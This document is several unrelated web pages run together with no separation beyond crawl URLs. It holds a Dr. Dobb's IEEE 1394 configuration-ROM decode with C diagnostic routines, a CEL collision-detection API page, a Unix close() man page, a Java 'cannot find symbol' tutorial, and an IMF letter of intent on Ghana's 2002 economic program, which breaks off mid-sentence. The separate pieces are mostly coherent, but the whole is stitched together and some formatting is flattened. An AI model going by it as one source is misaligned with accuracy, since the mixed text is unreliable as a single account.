1394 Addr Off Data ------------- -------- -------- -------- -------- FFFF:F0000400 04302F55 31333934 00FF5002 00A0B800 FFFF:F0000410 00005009 0006E8D7 0C0083C0 0300A0B8 FFFF:F0000420 81000011 0400500A 81000015 D1000001 FFFF:F0000430 000C6208 1200609E 13010483 3C002600 FFFF:F0000440 5400C000 3A401E08 3800609E 390104D8 FFFF:F0000450 3B000000 3D000000 14000000 17000000 FFFF:F0000460 8100000E 000568A5 00000000 00000000 FFFF:F0000470 4C534920 4C6F6769 63000000 0006EBEF FFFF:F0000480 00000000 00000000 4C534920 35303120 FFFF:F0000490 72657620 42330000 000AE09E 00000000 FFFF:F00004A0 00000000 53594D31 33465735 30302D44 FFFF:F00004B0 49534B20 44524956 45000000 00000000 FFFF:F00004C0 00000000 Decode of the Configuration ROM 1394 Addr Off Quadlet Meaning ------------- -------- -------------------------------------------------- Confiruation ROM Header FFFF:F0000400 04302F55 info_length=04, crc_length=30, rom_crc_value=2F55 Bus_Info_Block FFFF:F0000404 31333934 bus_name=31333934 ("1394") FFFF:F0000408 00FF5002 irmc=0, cmc=0, isc=0, bmc=0, cyc_clk_acc=FF, max_rec=5 FFFF:F000040C 00A0B800 node_vendor_id=00A0B8, chip_id_hi=00 FFFF:F0000410 00005009 chip_id_lo=00005009 Root_Directory FFFF:F0000414 0006E8D7 length=0006, crc=E8D7 FFFF:F0000418 0C0083C0 Node_Capabilities spt 64 fix lst drg FFFF:F000041C 0300A0B8 Module_Vendor_Id 00A0B8 FFFF:F0000420 81000011 Textual_Descriptor leaf ind_off=000011 (FFFF:F0000464) FFFF:F0000424 0400500A Module_Hw_Version 00500A FFFF:F0000428 81000015 Textual_Descriptor leaf ind_off=000015 (FFFF:F000047C) FFFF:F000042C D1000001 Unit_Directory directory ind_off=000001 (FFFF:F0000430) Unit_Directory directory referenced from FFFF:F000042C FFFF:F0000430 000C6208 length=000C, crc=6208 FFFF:F0000434 1200609E Unit_Spec_Id 00609E FFFF:F0000438 13010483 Unit_Sw_Version 010483 FFFF:F000043C 3C002600 Firmware_Revision 002600 FFFF:F0000440 5400C000 Management_Agent crc_offset=00C000 (FFFF:F0030000) FFFF:F0000444 3A401E08 Unit_Characteristics 401E08 FFFF:F0000448 3800609E Command_Set_Spec_Id 00609E FFFF:F000044C 390104D8 Command_Set 0104D8 FFFF:F0000450 3B000000 Commanmd_Set_Revision 000000 FFFF:F0000454 3D000000 key=3D (UNKNOWN) value = 000000 FFFF:F0000458 14000000 Logical_Unit_Number o=0, device_type=00, lun=0000 FFFF:F000045C 17000000 Model_Id value = 000000 FFFF:F0000460 8100000E Textual_Descriptor leaf ind_off=00000E (FFFF:F0000498) Textual_Descriptor leaf referenced from FFFF:F0000420 FFFF:F0000464 000568A5 length=0005, crc=68A5 FFFF:F0000468 00000000 .... FFFF:F000046C 00000000 .... FFFF:F0000470 4C534920 LSI FFFF:F0000474 4C6F6769 Logi FFFF:F0000478 63000000 c... Textual_Descriptor leaf referenced from FFFF:F0000428 FFFF:F000047C 0006EBEF length=0006, crc=EBEF FFFF:F0000480 00000000 .... FFFF:F0000484 00000000 .... FFFF:F0000488 4C534920 LSI FFFF:F000048C 35303120 501 FFFF:F0000490 72657620 rev FFFF:F0000494 42330000 B3.. Textual_Descriptor leaf referenced from FFFF:F0000460 FFFF:F0000498 000AE09E length=000A, crc=E09E FFFF:F000049C 00000000 .... FFFF:F00004A0 00000000 .... FFFF:F00004A4 53594D31 SYM1 FFFF:F00004A8 33465735 3FW5 FFFF:F00004AC 30302D44 00-D FFFF:F00004B0 49534B20 ISK FFFF:F00004B4 44524956 DRIV FFFF:F00004B8 45000000 E... FFFF:F00004BC 00000000 .... FFFF:F00004C0 00000000 .... Listing Two //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ // DiagnoseAllAdapters // Puts/Takes all 1394 controllers into/out of diagnostics mode // Entry: // hWnd Window handle // bMode Mode flag // TRUE = turn on diagnostic mode // FALSE = turn off diagnostic mode // Exit: // TRUE All 1394 adapters are in/out of diagnostic mode // FALSE operation failed //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ BOOL DiagnoseAllAdapters ( HWND hWnd, BOOL bMode) { //#define DEBUGFLAGS DebugThisRoutine BOOL retcode; HANDLE hDev; DWORD dwRet; DWORD dwBytesRet; CHAR DeviceName[STRING_SIZE]; DWORD index; DWORD numAdaptersToggled; DBOUT (DBG_LF_ENTRY, "DiagnoseAllAdapters\r\n"); // Assume failure retcode = FALSE; // Get 1394 bus class driver's symbolic name strcpy (DeviceName, BUS_SYMBOLIC_LINK); pDiagnosticDeviceName = DeviceName; // Find all of the host controllers for(index = 0, numAdaptersToggled = 0; index < 10; index++) { // Create next host controller name pDiagnosticDeviceName[11] = (char)('0' + index); // try to open it //MyPrintf ("Attempting to open 1394 adapter %s ...", pDiagnosticDeviceName); hDev = CreateFile( pDiagnosticDeviceName, GENERIC_WRITE | GENERIC_READ, FILE_SHARE_WRITE | FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL); if(hDev == INVALID_HANDLE_VALUE) { continue; } // Put into or take out of diagnostic mode dwRet = DeviceIoctl( hWnd, hDev, DeviceName, (bMode) ? IOCTL_1394_TOGGLE_ENUM_TEST_ON : IOCTL_1394_TOGGLE_ENUM_TEST_OFF, NULL, 0, NULL, 0, &dwBytesRet); if (!dwRet) { dwRet = GetLastError(); MyPrintf ("\r\nError = 0x%08X\r\n"); } else { numAdaptersToggled++; if (bMode == TRUE) MyPrintf ("Device %s in diagnostic mode\r\n", DeviceName); else MyPrintf ("Device %s out of diagnostic mode\r\n", DeviceName); } // Close the current host controller CloseHandle(hDev); } // Did we toggle any adapters? if (numAdaptersToggled != 0) retcode = TRUE; DBOUT1 (DBG_LF_EXIT, "DiagnoseAllAdapters exit, retcode = %s\r\n", retcode==TRUE?"TRUE":"FALSE"); return (retcode); #define DEBUGFLAGS DebugFlags } Listing Three //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ // ConfirmDeviceAttached // Confirms that a diagnostic 1394 device is attached and ready to go. // Entry: // hWnd Window handle // szDeviceName Name of driver device to which a // diagnotic device should be attached. // Exit: // TRUE Device is attached and ready // FALSE No devices present //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ BOOL ConfirmDeviceAttached ( HWND hWnd, PSTR szDeviceName) { //#define DEBUGFLAGS DebugThisRoutine BOOL retcode; HANDLE hDev; DWORD dwRet, dwBytesRet; PNODE_INFO pNodeInfo; CHAR tmpBuff[STRING_SIZE]; ULONG Node = 0L; ULONG i; int ccode; DBOUT (DBG_LF_ENTRY, "ConfirmDeviceAttached\r\n"); // Assume failure retcode = FALSE; // set this to no device under test numDevices = 0; hDev = INVALID_HANDLE_VALUE; // Open the adapter hDev = OpenDevice(hWnd, szDeviceName, TRUE); if(hDev == INVALID_HANDLE_VALUE) goto OpenError; // Allocate a buffer pNodeInfo = (PNODE_INFO) GlobalAlloc(GPTR, MAX_INFO_BUFF_SIZE); if(pNodeInfo == NULL) goto AllocError; // Extract node info dwRet = DeviceIoctl(hWnd, hDev, szDeviceName, GET_NODE_INFO, NULL, 0, pNodeInfo, MAX_INFO_BUFF_SIZE, &dwBytesRet); if(dwRet == 0) goto NodeInfoError; // let's go ahead and throw this in the edit control // get the number of current devices numDevices = pNodeInfo->numEntries; MyPrintf ("Found %d devices on %s\r\n", numDevices, szDeviceName); // allocate memory for keeping info about devices around // if we have device info get rid of it for new if(pDeviceInfo != NULL) GlobalFree(pDeviceInfo); // now allocate memory for device info on all devices pDeviceInfo = (PDEVICE_INFO) GlobalAlloc(GPTR, sizeof(DEVICE_INFO) * numDevices); i = pNodeInfo->numEntries-1; // print out node info if (pNodeInfo->numEntries) MyPrintf ("Device List:\r\n"); while(Node < pNodeInfo->numEntries) { // save device info in our freshly allocated buffer pDeviceInfo[i].nodeInfo = pNodeInfo->entry[Node]; MyPrintf ( "Name = %s, Port = %04X, Bus = %04X, Node = %04X\r\n", pDeviceInfo[i].nodeInfo.LinkName, pDeviceInfo[i].nodeInfo.RawAddress.Port, pDeviceInfo[i].nodeInfo.RawAddress.NA_Bus_Number, pDeviceInfo[i].nodeInfo.RawAddress.NA_Node_Number); // if it's a raw device then save that in link name // otherwise, fill in with real name if(strcmp(pDeviceInfo[i].nodeInfo.LinkName, RAW_DEVICE) != 0) { // it's not a raw device so let's stick stuff on front strcpy(tmpBuff, DEFAULT_DEVICE_LINK); strcpy(&tmpBuff[4], pDeviceInfo[i].nodeInfo.LinkName); strcpy(pDeviceInfo[i].nodeInfo.LinkName, tmpBuff); pDeviceInfo[i].bRawDevice = FALSE; } else { // just copy in global symbolic link strcpy(pDeviceInfo[i].nodeInfo.LinkName, GLOBAL_SYMBOLIC_LINK); pDeviceInfo[i].bRawDevice = TRUE; } // next node Node++; i--; } // Select a device and default to the first one deviceUnderTest = 0; if (pNodeInfo->numEntries > 1) { // Display device dialog box and let use chose one ccode = DialogBox((HINSTANCE) GetWindowLong(hWnd, GWL_HINSTANCE), "SelectDevice", hWnd, (DLGPROC) SelectDeviceDlgProc); if (ccode != TRUE) goto Exit; } // Do we have any entries? if (pNodeInfo->numEntries) retcode = TRUE; // Display selected device i = deviceUnderTest; MyPrintf ("\r\n\r\nSelected device: index = %d, Name = %s, Port = %04X, Bus = %04X, Node = %04X\r\n", i, pDeviceInfo[i].nodeInfo.LinkName, pDeviceInfo[i].nodeInfo.RawAddress.Port, pDeviceInfo[i].nodeInfo.RawAddress.NA_Bus_Number, pDeviceInfo[i].nodeInfo.RawAddress.NA_Node_Number); Exit: // free up resources if (hDev != INVALID_HANDLE_VALUE) CloseHandle(hDev); if(pNodeInfo) GlobalFree(pNodeInfo); DBOUT1 (DBG_LF_EXIT, "ConfirmDeviceAttached exit, retcode = %s\r\n", retcode==TRUE?"TRUE":"FALSE"); return (retcode); OpenError: MyPrintf ("\r\nConfirmDeviceAttached: Unable to open %s\r\n",szDeviceName); goto Exit; AllocError: MyPrintf ("\r\nConfirmDeviceAttached: Unable to allocate memory\r\n"); goto Exit; NodeInfoError: MyPrintf ("\r\nConfirmDeviceAttached: Unable to read node information from %s\r\n"); goto Exit; #define DEBUGFLAGS DebugFlags }
http://www.drdobbs.com/windows/a-wdm-ieee-1394-configuration-rom-decode/184411134
CC-MAIN-2016-30
en
refinedweb
iPcCollisionDetection Struct ReferenceThis property class controls collision detection of an entity with the world map and other meshes. More... #include <propclass/colldet.h> Inheritance diagram for iPcCollisionDetection: Detailed DescriptionThis property class controls collision detection of an entity with the world map and other meshes. It should be used in combination with iPcLinearMovement but otherwise doesn't depend on any other property classes. So in that sense it is unrelated to the other movement property classes. Definition at line 41 of file colldet.h. Member Function Documentation This function takes a position vector, checks against all known colliders, and returns the adjusted position in the same variable. Initialize CD box for the object. The two parameters are the dimensions of the body and the legs collider boxes. The 'shift' vector is used to shift the box. By default (with shift equal to the 0 vector) the colliders are created assuming the 0,0,0 origin is at the bottom center of the actor. Check if mesh is on ground. Set on Ground flag. The documentation for this struct was generated from the following file: Generated for CEL: Crystal Entity Layer 1.2 by doxygen 1.4.7
http://crystalspace3d.org/cel/docs/online/api-1.2/structiPcCollisionDetection.html
CC-MAIN-2016-30
en
refinedweb
NAME | SYNOPSIS | DESCRIPTION | RETURN VALUES | ERRORS | USAGE | ATTRIBUTES | SEE ALSO #include <unistd.h>int close(int fildes); The close() function will deallocate(3)) process group,. If fildes refers to a socket, close() causes the socket to be destroyed. If the socket is connection-mode, and the SOCK_LINGER option is set for the socket, and the socket has untransmitted data, then close() will block for up to the current linger interval until all data is transmitted. Upon successful completion, 0 is returned. Otherwise, -1 is returned and errno is set to indicate the error. The close() function will fail if: The fildes argument is not a valid file descriptor. The close() function was interrupted by a signal. The fildes argument is on a remote machine and the link to that machine is no longer active. There was no free space remaining on the device containing the file. The close() function may fail if: An I/O error occurred while reading from or writing to the file system. An application that used the stdio function fopen(3C) to open a file should use the corresponding fclose(3C) function rather than close(). See attributes(5) for descriptions of the following attributes: intro(3), creat(2), dup(2), exec(2), fcntl(2), ioctl(2), open(2) pipe(2), fattach(3C), fclose(3C), fdetach(3C), fopen(3C), signal(3C), attributes(5), signal(3HEAD), streamio(7I) NAME | SYNOPSIS | DESCRIPTION | RETURN VALUES | ERRORS | USAGE | ATTRIBUTES | SEE ALSO
http://docs.oracle.com/cd/E19455-01/806-0626/6j9vgh64n/index.html
CC-MAIN-2016-30
en
refinedweb
Whenever a Compiler does not recognize a class name, Java displays an error “cannot find symbol”. The reason behind cannot find symbol error is: Following example will help you understand the java error cannot find symbol. In this example a class name 'cannot find symbol' is used. int variable “w” and “x” with respective values have been initialized. int “y” stores the sum of their value. The System.out.println is used to print the output. But programmer instead of writing “y”, wrote variable “z”. The compiler did not recognize a variable “z” and displays an error “Java error cannot find symbol”. Cannotfindsymbol.java import java.lang.*; public class Cannotfindsymbol { public static void main(String[] args) { try{ int w=10; int x=3; int y=w+x; System.out.println(z); } catch(Exception ex){ System.out.println(ex); } } } Output: /home/girish/NetBeansProjects/errors/src/ Cannotfindsymbol.java:11: cannot find symbol symbol: variable z location: class Cannotfindsymbol System.out.println(z); 1 error0 *To remove this error you have to declare the variable z. cannot find symbol Post your Comment
http://roseindia.net/java/java-get-example/java-error-cannot-find-symbol.shtml
CC-MAIN-2016-30
en
refinedweb
Free Email Notification Receive emails when we post new items of interest to you.Subscribe or Modify your profile Ghana—Letter of Intent, Memorandum of Economic and Financial Policies, and Technical Memorandum of Understanding January 31, 2002 Dear Mr. Köhler: 1. On May 3, 1999, the Executive Board of the Fund approved a three-year arrangement for Ghana under the Poverty Reduction and Growth Facility (PRGF). The purpose of this letter is to inform you of the progress made in implementing the third year of the economic program, and to request an extension of the arrangement and disbursement of the fifth loan under the arrangement following completion of the fourth review. 2. The attached Memorandum of Economic and Financial Policies (Attachment I) sets out the objectives and policies that the Government of Ghana intends to pursue during 2002. The Technical Memorandum of Understanding (Attachment II) provides explanatory notes to clarify the MEFP. 3. The recently elected Government of Ghana made considerable progress in stabilizing the economy in 2001, as evidenced by sharply lower inflation and a stabilization of the exchange rate. The Government of Ghana believes that the policies it intends to implement in 2002, as described in the MEFP, will further cement macroeconomic stability and create the conditions for sustained economic growth. On this basis, it requests completion of the fourth review under the arrangement, and waivers for the nonobservance of the end-August 2001 performance criteria on: (a) the stock of outstanding short-term external debt contracted or guaranteed by the government or the Bank of Ghana; (b) the stock of government road arrears; (c) the restructuring of the bank debt of the Tema Oil Refinery; and (d) completion of the audit of 2000 domestic arrears and plan for their liquidation. 4. The Government made every effort to implement its program on schedule under very difficult circumstances. In assessing compliance with performance criteria for August 31, 2001, it may be noted that, with regard to the short-term external debt, in the course of the recent review of the data with Fund staff, the technical coverage of this item was revised to include outstanding overdraft positions of the Bank of Ghana with correspondent banks as reflected in the Statement of Accounts (on a gross basis) and not the previously reported Treasury Data (which was on a net basis). Second, the TOR debt restructuring agreement with the major commercial bank creditor was reached in August while the other bank signed off on September 13, 2001, barely two weeks after the August 31 deadline. The two agreements became effective in July and August 2001 respectively, and the Government has made the first semi-annual payments on these bonds. 5. On completion of the fourth review, the government of Ghana requests disbursement under the PRGF arrangement of SDR 52.58 million. A fifth review under the PRGF arrangement will be completed by November 15, 2002. In order to allow time for this final review to be completed, we request an extension of the arrangement to November 30, 2002.. 7. The Government of Ghana will continue to provide the Fund with such information as the Fund requires to assess Ghana's progress in implementing the economic and financial policies described in the attached memorandum. 8. The Government of Ghana intends to make these understandings public and authorizes the Fund to provide this letter and the attached memorandum to all interested parties that so request, including through the Fund's external website. 9. We can assure you Mr. Managing Director, that the Government of Ghana is determined to fully implement the program and we hope we can count on the continued support of the Fund in our endeavors. Hon. Yaw Osafo-Maafo, MP Minister of Finance Hon. Paul A. Acquah Governor of the Bank of Ghana Memorandum of Economic and Financial Policies of the Government of Ghana for 2002 January 31, 2002 I. Introduction 1. Following the severe terms of trade shock and financial crisis in 2000, the newly-elected government of Ghana adopted an economic program for its first year in office with the paramount objectives of curtailing inflation and putting the public finances back on a sustainable path. This program, which was set out in our Memorandum of Economic and Financial Policies dated June 11, 2001, was the initial phase of a medium-term strategy aimed at reducing domestic indebtedness and freeing up scarce resources for investment and growth in the Ghanaian economy. At the same time, the government worked to elaborate and expand that strategy, with the broad-based participation of civil society and the international community, into a comprehensive plan for accelerated development and sustained poverty reduction. These efforts are expected to culminate with the completion of the Ghana Poverty Reduction Strategy (GPRS) in early 2002, which will lay out the broad policy agenda for 2002-2004. 2. In support of its poverty reduction strategy, and its own efforts to reduce the burden of domestic public debt, the government decided to seek relief on its external debt obligations, including under the enhanced HIPC Initiative. Current estimates suggest that Ghana could in due course receive debt relief equivalent to 56 percent of the value of its external debt at end-2000 under the enhanced HIPC Initiative, and that external debt payments would be reduced in 2002 by US$249 million. 3. This memorandum reports on implementation of the government's economic program in 2001, and sets out key elements of the 2002 program, in line with the draft GPRS. The program for the coming year will seek to build on progress achieved thus far in achieving financial stability, while intensifying efforts to strengthen public sector management and lay the foundations for sustained economic growth. II. Program Performance During 2001 4. During 2001, considerable progress was made in achieving stabilization of the Ghanaian economy. From a peak of 42 percent in March 2001, consumer price inflation declined to 21 percent by December, compared to the program target of 25 percent. Following a sharp depreciation in 2000, the cedi stabilized at around 7,200 per U.S. dollar during 2001. Gross international reserves continued to recover, from US$264 million at end-2000 to a projected US$352 million (1.2 months of imports) by December 2001. The objective of 4 percent real growth in the economy is expected to be realized, aided in part by stability in the terms of trade, following sharp losses in the previous two years. 5. These positive results were achieved by firm financial discipline. Aided by government's strict control of cash expenditures, the Bank of Ghana succeeded in reducing the stock of reserve money by 5 percent during the first eight months of 2001, reversing a good part of the excessive monetary expansion that occurred in 2000. The end-August 2001 targets for the government's domestic primary surplus and net domestic financing, and for increases in the net domestic assets and net international reserves of the Bank of Ghana, were all met. The program limit on nonconcessional external borrowing was also observed, but the ceiling on short-term external debt was exceeded, due to the inclusion in the data of the Bank of Ghana's overdraft positions with foreign banks. These overdraft positions had previously been netted from gross reserves rather than recorded as short-term debt. 6. While cash expenditures of the government were kept within budget, control of spending commitments remained weak. The new system for cash flow forecasting and ceilings on expenditure commitments was not fully implemented during the third quarter of 2001, as had been hoped. As a result, new non-road arrears of some 176 billion are estimated to have accumulated during the first eight months of the year. The stock of road arrears, which was targeted to decline to 190 billion by end-August 2001, instead continued to rise to 278 billion by that date. In addition, a total of 393 billion in outstanding payments due to the District Assemblies Common Fund (DACF), Ghana Education Trust Fund (GETF), and Social Security and National Insurance Trust (SSNIT) were accumulated in the year to end-August 2001. At the same time, however, the government cleared 442 billion in pre-2001 non-road arrears, more than double the amount originally budgeted for arrears clearance in 2001. 7. The government attaches great importance to its objective of reducing the domestic debt burden, and hence was determined to achieve its original program target for the domestic primary balance of 1,515 billion for 2001 as a whole. Tax revenues are expected to fall some 3½ percent below target in 2001, due in part to delays in implementing some of the 2001 Budget measures, while the wage settlement finally negotiated with public service workers was higher than planned. To offset these losses to the budget, the government set reduced ceilings on expenditures for goods and services and capital projects for the last quarter of 2001, which were rigorously enforced by the CAGD and Ministry of Finance. At the same time, the government decided that it was unwise to transfer during the remainder of 2001 the full amount of statutory payments accruing to the DACF and GETF, given the funds' limited capacity to spend these resources in 2001. Instead, the government transferred approximately 35 percent of its 2001 obligations to these funds before the end of 2001, and the balance will be transferred in tranches during 2002-2004. 8. The program envisaged that a full audit of the stock of expenditure arrears accumulated in 2000 would be completed by end-August 2001, and a plan adopted for their liquidation. In the event, the work needed to carry out this audit, which was conducted by donor-funded consultants, was considerably more extensive than expected, and the full audit will now be completed by end-March 2002. However, the auditors have provided an interim report with a preliminary estimate for pre-2001 non-road, non-statutory arrears of 420 billion. In addition, the government has supplemented this work with its own audit of non-road government expenditure arrears accumulated during January-August 2001 and of the stock of outstanding road arrears, to provide a more complete assessment of the scale of arrears that would need to be addressed in the 2002 Budget. Meanwhile, for the remainder of 2001, sufficient funds were allocated to clear all but 35 billion of the new non-road arrears accumulated in 2001, and to limit the increase in the stock of road arrears during the year to 81 billion. 9. Progress was made on the implementation of structural measures affecting public enterprises in the energy sector, although with some delays. Agreements were reached in August and September with creditor banks to restructure a portion of the domestic debt of Tema Oil Refinery (TOR) that had resulted from a failure to adjust petroleum prices in line with world prices in 1999 and 2000. The agreements reached with the commercial bank creditors on TOR debt were effective in July and August and the government effected the first semi-annual interest payments due to the banks on the bonds in December 2001 and January 2002 respectively. In exchange for short-term claims on TOR, banks received longer-maturity government bonds. On August 17, 2001, a 15 percent excise tax was imposed on petroleum products, followed on October 31 by specific duties averaging 200 per liter. In addition, in order to defray further TOR's accumulated debts resulting from previous petroleum price controls, Parliament has approved the principle that part of any potential savings which may accrue from future reductions in world oil prices would be used to service the TOR debt. Accordingly, the petroleum price adjustment formula will be modified from end-March 2002 to incorporate a petroleum debt service surcharge (PDSS), where the PDSS will be set at 95 percent of any decline in oil import costs from the average level prevailing during November 27-December 26, 2001. The petroleum price adjustment formula, as modified, will be applied throughout 2002. 10. The Public Utilities Regulatory Commission held extensive public hearings during the summer of 2001 on plans for a phased transition to full cost recovery in the electricity sector and implementation of an automatic tariff adjustment formula for electricity tariffs. The plan was finalized in November 2001, and implementation will begin by end-April 2002. A similar consultative process is underway on a transitional plan for cost recovery in water tariffs. In this case, however, complications related to the authorities' intention to seek a private capital injection for the upgrading and expansion of the water infrastructure will delay conclusion and implementation of the water tariff adjustment plan to June 2002. 11. The government had intended to raise not less than US$50 million from divestiture proceeds in 2001. However, a new Board for the Divestiture Implementation Committee (DIC), which would oversee and ensure the transparency of these asset sales, was not approved by the Council of State until late August 2001. Work then began in earnest on the necessary asset valuations, but the delays mean that the proceeds from divestiture in 2001 will be no more than US$14 million. Financial and management audits of 11 major public enterprises, including ECG, GWCL, and TOR, were initiated in August 2001 and final reports were submitted on December 15, 2001. Consideration is being given to launching similar audits for Cocobod, VRA, and GPHA, which would be completed by mid-2002. 12. As part of its strategy to ease the burden of domestic debt on Ghana's economy, the government began in September 2001 to extend the maturity of its domestic debt by issuing three-year inflation-indexed bonds. By end-2001, it was expected that approximately one fifth of the stock of 90-day treasury bills would have been replaced with the new indexed instruments. 13. As planned, a revised Bank of Ghana Law was submitted to Parliament in August 2001, and passed into law in December. The new law clarifies the objectives and strengthens the independence of the central bank. Progress in this respect was reinforced by the Bank of Ghana's divestiture in December 2001 of all remaining shareholdings in financial institutions that it supervises. III. The Program for 2002 A. Macroeconomic Objectives 14. In line with the medium-term objectives laid out in the GPRS, the government's economic program for 2002 is designed to: Key policies needed to deliver these outcomes and lay the foundations for further gains in subsequent years include: B. Financial Policies for 2002 Fiscal Policy 15. The government's detailed expenditure plans for 2002 have been drawn up in line with the programs and priorities identified in the draft GPRS. In formulating these plans, the government has made provision for a 20 percent full-year increase in civil service wages, which together with the 2001 pay increase will more than fully correct the erosion in real wages of government workers that occurred during 1999 and 2000. The budget will also incorporate real increases in allocations for domestic capital expenditure, by comparison with the necessarily tight limits imposed in 2001, to give effect to the development goals outlined in the GPRS. Overall capital expenditures could be increased further if additional foreign assistance were to become available. The statutory transfers due to the DACF, GETF, and SSNIT in 2002 will be budgeted and paid in full, in addition to 337 billion of unpaid obligations from 2001. For the first time, the 2002 Budget will also contain an explicit allocation to cover the cost of price subsidies in the electricity and water sectors (see below). 16. To fund these spending needs while maintaining a firm downward trend in the ratio of domestic debt to GDP, the government will introduce revenue measures with a total yield of 1 percent of GDP in 2002. These measures will be designed to place government finances on a sounder long-term footing by emphasizing efficient, broad-based taxation. The total package will include some initial measures to be introduced with the 2002 Budget, with a combined yield of 0.3 percent of GDP. These will include the elimination of a range of tax and tariff exemptions, the application of a 5 percent import duty rate to a set of major product lines that are currently zero-rated, the application of a 1 percent processing fee on all remaining zero-rated items and on items attracting a 10 percent concessionary rate, the introduction of a 10 percent withholding tax on rental income, and a restructuring of the lottery sector to increase the proceeds flowing to the budget. Further broad-based measures with a 2002 yield of not less than 330 billion (equivalent to 0.7 percent of GDP) will be formulated and submitted to Parliament, for intended passage before the summer parliamentary recess in August 2002. 17. The government has already taken a range of measures designed to strengthen revenue collection and administration, including the creation of a National Tax Audit Team and appointment of a head of the Revenue Agencies Governing Board (RAGB) to enhance coordination among the separate agencies. One task of the RAGB will be to ensure full implementation by CEPS and IRS of the common Taxpayer Identification Number (TIN) by June 2002. In addition, government intends to announce in the 2002 Budget plans to create a fully integrated Large Taxpayers Unit (LTU), with the purpose of amalgamating the assessment, processing, and auditing functions for all the tax liabilities of each large taxpayer. A timetable for creation of the LTU will be adopted by end-June 2002. While these measures will generate additional receipts over time, for reasons of prudence, no allowance for additional receipts has been made in the revenue projections for 2002. 18. The government will request that Ghana's increased revenue effort be supplemented by external debt relief under the enhanced HIPC Initiative. The total relief that Ghana could receive in 2002 is estimated at US$249 million (net of debt service on the deferral of 2001 payments), which is equivalent to about 4 percent of GDP. Of this, the portion ascribed to traditional debt relief mechanisms (US$153 million) has already been incorporated in the fiscal program for 2002. From the additional component (US$96 million) attributable to enhanced HIPC relief, 80 percent will be used to fund further poverty-related expenditures, as specified in the GPRS, and 20 percent to reduce domestic debt. 19. Net domestic financing of the government will not exceed 139 billion (0.3 percent of GDP) in 2002. This assumes program loans and grants of 1,313 billion and divestiture proceeds of 377 billion, in addition to the budgetary savings from projected debt relief. A financing gap of 427 billion remains, for which the government intends to seek additional concessional program support. To the extent that the realized sum of divestiture receipts and program loans and grants exceeds the amounts assumed in the fiscal program, the additional resources will be used to accelerate the process of domestic debt reduction, thereby making room for additional priority expenditures in subsequent years. If the aggregate receipts from program loans and grants 20. The government attaches the highest priority to the effective control and monitoring of public expenditure. The establishment of effective expenditure control, particularly at the commitment stage, is a central plank of the program for 2002, and is a prerequisite for ensuring the appropriate use of interim relief under the enhanced HIPC Initiative. The government will therefore implement, throughout 2002, the following procedures: To verify that these procedures are in place, the Ministry of Finance has issued to MDAs the disaggregated expenditure ceilings for the first quarter of 2002, and the CAGD has produced the reports specified above for the months of January-October 2001. 21. The stock of expenditure arrears on road projects continued to mount during 2001, contrary to the government's specified objective that this stock be sharply reduced. As a result, and pending the completion of ongoing audits of road arrears, the target date for their full clearance has been pushed back from March to June 2002. In support of this goal, the government will take steps to improve the control over expenditure commitments in the road sector by limiting certificates of continuation on ongoing projects and new certificates of commencement to the quarterly 2002 budget allocations for the Ministry of Roads, while ensuring that the stock of road arrears is cleared on schedule. The government will also seek to rescind those contracts for road construction that allow contractors willing to prefinance new projects to initiate work without prior authorization, since such contracts inhibit the government's ability to control its financial obligations. 22. The enhanced external debt monitoring practices adopted in 2001 (as described in the TMU) are in place and being followed. These include tighter control over the contracting of new government debt to ensure a grant element of at least 35 percent in all new borrowing, closer monitoring of external debt service obligations and payments, and a more systematic exchange of external debt information between the Ministry of Finance aid and debt management unit and the Bank of Ghana. Monetary, Exchange Rate and Financial Sector Policies 23. To achieve the target rate of inflation for end-2002, the Bank of Ghana will use appropriate monetary instruments to control growth in its net domestic assets, and hence in reserve money growth. The quarterly targets, consistent with reserve money growth during 2002 of 18.7 percent, are shown in Table 1. This should be sufficient to accommodate the target level for credit to the government and a rebuilding of net international reserves (NIR) by at least US$156 million. 24. The government and the Bank of Ghana have agreed that it is important, for the purposes of safeguarding the financial system as well as the public purse, that the finances of public enterprises and the impact of their operations on the banking system be more closely monitored. For this purpose, the Portfolio Management Unit in the Ministry of Finance will prepare quarterly reports for the Minister of Finance and the Governor of the Bank of Ghana on the financial positions of Cocobod, ECG, SSNIT, TOR, and VRA. 25. The functioning of the foreign exchange market has improved markedly in 2001, as monetary discipline has been restored and macroeconomic performance strengthened. The Bank of Ghana has maintained a policy of non-intervention in the exchange market, and has made no foreign exchange sales to the market other than those for oil imports, allowing the exchange rate to be determined by market forces. 26. Looking ahead, the Bank of Ghana intends to build on this progress and foster the development of an effective interbank foreign exchange market. It is important, however, to proceed cautiously and prepare the ground well. In particular, a viable market-based arrangement for financing oil imports must be secured before steps are taken to redirect cocoa proceeds, which are currently surrendered to the Bank of Ghana in large and discrete amounts, into the commercial banking system. A plan to this effect will be developed following consultations with commercial banks, during the first quarter of 2002, on the appropriate market structures and technical reforms needed to facilitate interbank trading in foreign exchange. C. Structural Policies for 2002 27. The government regards restoring the financial health of the public energy and utility companies as one of its highest priorities over the next 1-2 years. To prevent a recurrence of the huge parastatal losses built up in 1999 and 2000, which will be a burden on consumers and taxpayers for many years to come, the government intends to: So as not to further aggravate the finances of the parastatals, the government will remain current on its own payments for utilities and on the budget transfers needed to cover the implicit consumer subsidies. 28. A preliminary assessment indicates that the impact of the TOR debt restructuring has worked to lift pressure from the balance sheets of commercial banks and begin stabilizing TOR's own financial position. TOR's cash flow is expected to improve substantially when secondary distillation facilities come on line in the second half of 2002. Meanwhile the authorities are in discussions with private sector firms on a comprehensive agreement to assume full management of the refinery. The government also intends to consult with oil companies and other stakeholders with a view to the possible dismantling of TOR's monopoly of the import of petroleum products. This would enhance competition in the petroleum sector, as well as aiding development of the interbank foreign exchange market. 29. The government regards divestiture of state holdings in commercial enterprises as a core component of its strategy to promote private sector development. The agenda for 2002 includes: 30. To further its goal of improving the country's investment climate, the government is in the process of establishing an Investors' Advisory Council, the inaugural meeting of which is planned for April 2002. This body will be chaired by the President of Ghana, and will include top-level executives from the Ghanaian business community, multinational companies invested in Ghana, and other major international companies. Its broad objective is to provide a local and international investors' perspective on 